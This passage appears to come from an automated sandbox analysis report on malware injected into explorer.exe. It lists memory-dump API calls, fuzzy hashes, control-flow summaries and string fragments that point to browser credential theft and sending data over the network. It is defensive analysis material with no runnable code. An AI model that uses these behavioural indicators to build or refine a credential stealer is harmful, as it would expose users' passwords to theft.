                                                                            • Source File: 00000003.00000002.4209826259.000000000E5A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_e5a0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 2706961497-0
                                                                            • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                            • Instruction ID: 429ae53d18b6a7c2867cf7a7fe2dd6749827a12bf60fca4f9a9fec46b0bd91a5
                                                                            • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                            • Instruction Fuzzy Hash: F8019230628B484F8784EF7CA480126B7E4FBC9314F000B3EE59AC7254D760C5414742
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • NtProtectVirtualMemory.NTDLL ref: 0E63FE67
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209826259.000000000E5A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_e5a0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 2706961497-0
                                                                            • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                                            • Instruction ID: eedce1597bd3453fb98cac6c0c71676d75669c5538aa93d4bafd164783e21019
                                                                            • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                                            • Instruction Fuzzy Hash: E501A734628B884B8744EB7C94412A6B3E5FBCE314F000B3EE59AC3241DB21D5014782
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • ObtainUserAgentString.URLMON ref: 0E6399A0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209826259.000000000E5A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_e5a0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID: AgentObtainStringUser
                                                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                            • API String ID: 2681117516-319646191
                                                                            • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                            • Instruction ID: b61d80416e983574d158c4dca8ce6a2a0b584afbda0597144e828c8227ffa9ea
                                                                            • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                            • Instruction Fuzzy Hash: B531D171614A1C8BCF45EFA8D8847EDB7E1FB58305F40062EE45ED7240DE788A45CB99
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • ObtainUserAgentString.URLMON ref: 0E6399A0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209826259.000000000E5A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_e5a0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID: AgentObtainStringUser
                                                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                            • API String ID: 2681117516-319646191
                                                                            • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                            • Instruction ID: d76ed9447c327f199b4a8f96f059dfbab34ac69705779b05c503290108f63ce5
                                                                            • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                            • Instruction Fuzzy Hash: A621E370A14A1C8ACF45EFA8D8447EDBBE1FF59305F40461EE45AD7244DE788A048B89
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209826259.000000000E5A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_e5a0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID: CreateMutex
                                                                            • String ID: .dll$el32$kern
                                                                            • API String ID: 1964310414-1222553051
                                                                            • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                            • Instruction ID: 79740f492a4ebd70206cefd37054c577008bcd9e8c09d13b1131e388701f0c04
                                                                            • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                            • Instruction Fuzzy Hash: 40417B70918A088FDB94EFA8D8D87AD77E0FFA8300F14467ED84ADB255DE309945CB85
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209826259.000000000E5A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_e5a0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID: CreateMutex
                                                                            • String ID: .dll$el32$kern
                                                                            • API String ID: 1964310414-1222553051
                                                                            • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                            • Instruction ID: 706a07ba534bfd71e2b3ec11bf02bba7474b67f120840407fca87c511f87f9ae
                                                                            • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                            • Instruction Fuzzy Hash: F1413970918A088FDB84EFA8D498BED77E1FF68300F14456EC84ADB256DE309945CB85
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            control_flow_graph 293 e63b72e-e63b768 294 e63b76a-e63b782 call e63e942 293->294 295 e63b788-e63b7ab connect 293->295 294->295
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209826259.000000000E5A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_e5a0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID: connect
                                                                            • String ID: conn$ect
                                                                            • API String ID: 1959786783-716201944
                                                                            • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                                            • Instruction ID: c5545dc0fd1692ee01300dfef0674f5f38b93dc736b7bdd1a96da5cc4a7cabc8
                                                                            • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                                            • Instruction Fuzzy Hash: D2011E70618B188FCB94EF5CE088B55B7E0FB59314F1545AED90DCB266C674DD818BC2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            control_flow_graph 298 e63b732-e63b768 299 e63b76a-e63b782 call e63e942 298->299 300 e63b788-e63b7ab connect 298->300 299->300
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209826259.000000000E5A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_e5a0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID: connect
                                                                            • String ID: conn$ect
                                                                            • API String ID: 1959786783-716201944
                                                                            • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                            • Instruction ID: f2ba1d91b86bf388631e8589a5d7eaf65c908df70ffa8f59f2ceb74c831dd8db
                                                                            • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                            • Instruction Fuzzy Hash: 2C012C70618A1C8FCB84EF5CE088B55BBE0FB59314F1545AEA80DCB266CA74CD818BC2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            control_flow_graph 411 e63b6b2-e63b6e5 412 e63b6e7-e63b6ff call e63e942 411->412 413 e63b705-e63b72d send 411->413 412->413
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209826259.000000000E5A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_e5a0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID: send
                                                                            • String ID: send
                                                                            • API String ID: 2809346765-2809346765
                                                                            • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                            • Instruction ID: 2c2ad9a23d02c82c8ded048743244551058762005bba15468e0f1c47142cc6b3
                                                                            • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                            • Instruction Fuzzy Hash: E7011270518A188FDBC4EF1CE088B2577E0EB58314F1545AED85DCB266C670DC818B85
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            control_flow_graph 416 e63b5b2-e63b5ea 417 e63b60a-e63b62b socket 416->417 418 e63b5ec-e63b604 call e63e942 416->418 418->417
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209826259.000000000E5A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_e5a0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID: socket
                                                                            • String ID: sock
                                                                            • API String ID: 98920635-2415254727
                                                                            • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                            • Instruction ID: 7f0adc3a766df87d228c443c104e4b1f2dcd441b5e973e1acb9431941171e046
                                                                            • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                            • Instruction Fuzzy Hash: 80012C70618A188FCB84EF1CE048B54BBE0FB59314F1545AEE85ECB266C7B0C9858B86
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            control_flow_graph 421 e6332dd-e633320 call e63e942 424 e633326 421->424 425 e6333fa-e63340e 421->425 426 e633328-e633339 SleepEx 424->426 426->426 427 e63333b-e633341 426->427 428 e633343-e633349 427->428 429 e63334b-e633352 427->429 428->429 432 e63335c-e63336a call e63df12 428->432 430 e633370-e633376 429->430 431 e633354-e63335a 429->431 434 e6333b7-e6333bd 430->434 435 e633378-e63337e 430->435 431->430 431->432 432->430 438 e6333d4-e6333db 434->438 439 e6333bf-e6333cf call e633e72 434->439 435->434 437 e633380-e63338a 435->437 437->434 440 e63338c-e6333b1 call e634432 437->440 438->426 442 e6333e1-e6333f5 call e6330f2 438->442 439->438 440->434 442->426
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209826259.000000000E5A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_e5a0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID:
                                                                            • API String ID: 3472027048-0
                                                                            • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                                            • Instruction ID: ce67452a197780695d5c2caedc71b86f32d107fa2c9741a6d528c86ab4e78346
                                                                            • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                                            • Instruction Fuzzy Hash: C0317A74654B49DAEB64AF39A0882A5F3A1FB65300F64866EC92DCB306CB349854CF91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            control_flow_graph 457 e633412-e633446 call e63e942 460 e633473-e63347d 457->460 461 e633448-e633472 call e640c9e CreateThread 457->461
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209826259.000000000E5A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E5A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_e5a0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID: CreateThread
                                                                            • String ID:
                                                                            • API String ID: 2422867632-0
                                                                            • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                                            • Instruction ID: 89ff458a8a050d37df5d64fcf2a8eb27ba9f71596ea2205c5336bf92cd2eb5ab
                                                                            • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                                            • Instruction Fuzzy Hash: B5F0F630268B484FD788EF2CE44563AF3D0FBE9214F440A3EA55DC7364DA39C9814756
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209970262.000000000F1D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F1D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_f1d0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                                                            • API String ID: 0-393284711
                                                                            • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                            • Instruction ID: bee3779c0451cf85510fabea56e18ed1b6248b885e093cb94c9108bc28790f7f
                                                                            • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                            • Instruction Fuzzy Hash: F1E14970528F488FC764EF68C4947AAB7E0FB58300F904A2E959FC7286DF34A546CB85
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209970262.000000000F1D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F1D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_f1d0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                                                            • API String ID: 0-2916316912
                                                                            • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                            • Instruction ID: 9eced284cce8cb0e53ff228877b063f68acac5c67f6d5dc8ddaf9e8e2e7c9b35
                                                                            • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                            • Instruction Fuzzy Hash: 28B18C30528B488EDB55EF68C485AEEB7F1FFA8300F50451ED49AC72A2EF749445CB86
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209970262.000000000F1D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F1D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_f1d0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                                                            • API String ID: 0-1539916866
                                                                            • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                            • Instruction ID: d81ea336fbe4ac2c54b983de94b1d445eac00be809b4a44ca4d8bc7320c525a3
                                                                            • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                            • Instruction Fuzzy Hash: 9741B170A28B088FDB14DF98A44A6BD7BE2FB48700F40025ED409D3246DFB5AD45CBD6
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209970262.000000000F1D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F1D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_f1d0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                                                            • API String ID: 0-355182820
                                                                            • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                            • Instruction ID: 91fd6c61aae099ad2f2889e518910f095d70121879564641706de7fa2cc4ac43
                                                                            • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                            • Instruction Fuzzy Hash: 2BC14B70228B098FC758EF64C4956EAF3E1FB98304F40462E949EC7652DF34A516CBC6
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209970262.000000000F1D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F1D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_f1d0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                                                            • API String ID: 0-97273177
                                                                            • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                            • Instruction ID: d0fc3b3195f6fb3c485e9ed64690e975b5d57c2230159989090aa0c662e95910
                                                                            • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                            • Instruction Fuzzy Hash: A351D73112D7488FD719EF54C4816EAB7E5FB85700F501A2EE8CBC7296DBB4950ACB82
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209970262.000000000F1D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F1D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_f1d0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                            • API String ID: 0-639201278
                                                                            • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                            • Instruction ID: 45899ef1d1e0922b2324397c014f76be0795457d300047f50d20118c9805faed
                                                                            • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                            • Instruction Fuzzy Hash: 18C19070628B198FC758FF68D495AEAF3E1FB98300F954329840EC7692DF34A946C785
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209970262.000000000F1D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F1D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_f1d0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                            • API String ID: 0-639201278
                                                                            • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                            • Instruction ID: 9869e248738a1f44caa2256b3e85afbafbc947f62633288b1294fe9d890706fd
                                                                            • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                            • Instruction Fuzzy Hash: D7C18F70628B198FC758FF68D495AAAF3E1FB98300F954369840EC7292DF34A946C785
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209970262.000000000F1D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F1D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_f1d0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: UR$2$L: $Pass$User$name$word
                                                                            • API String ID: 0-2058692283
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209970262.000000000F1D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F1D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_f1d0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: UR$2$L: $Pass$User$name$word
                                                                            • API String ID: 0-2058692283
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209970262.000000000F1D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F1D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_f1d0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $.$e$n$v
                                                                            • API String ID: 0-1849617553
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209970262.000000000F1D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F1D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_f1d0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 2.dl$dll$l32.$ole3$shel
                                                                            • API String ID: 0-1970020201
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209970262.000000000F1D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F1D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_f1d0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4$\$dll$ion.$vers
                                                                            • API String ID: 0-1610437797
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209970262.000000000F1D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F1D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_f1d0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 32.d$cli.$dll$sspi$user
                                                                            • API String ID: 0-327345718
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209970262.000000000F1D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F1D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_f1d0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: .dll$el32$h$kern
                                                                            • API String ID: 0-4264704552
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209970262.000000000F1D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F1D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_f1d0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $Snif$f fr$om:
                                                                            • API String ID: 0-3434893486
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209970262.000000000F1D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F1D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_f1d0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $Snif$f fr$om:
                                                                            • API String ID: 0-3434893486
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209970262.000000000F1D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F1D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_f1d0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: .dll$chro$hild$me_c
                                                                            • API String ID: 0-3136806129
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209970262.000000000F1D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F1D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_f1d0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: .dll$chro$hild$me_c
                                                                            • API String ID: 0-3136806129
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209970262.000000000F1D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F1D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_f1d0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                            • API String ID: 0-319646191
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209970262.000000000F1D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F1D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_f1d0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                            • API String ID: 0-319646191
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209970262.000000000F1D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F1D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_f1d0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: .$l$l$t
                                                                            • API String ID: 0-168566397
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209970262.000000000F1D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F1D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_f1d0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: .$l$l$t
                                                                            • API String ID: 0-168566397
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.4209970262.000000000F1D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F1D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_f1d0000_explorer.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: auth$logi$pass$user
                                                                            • API String ID: 0-2393853802
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Execution Graph

                                                                            Execution Coverage:1.7%
                                                                            Dynamic/Decrypted Code Coverage:2.2%
                                                                            Signature Coverage:0%
                                                                            Total number of Nodes:594
                                                                            Total number of Limit Nodes:71
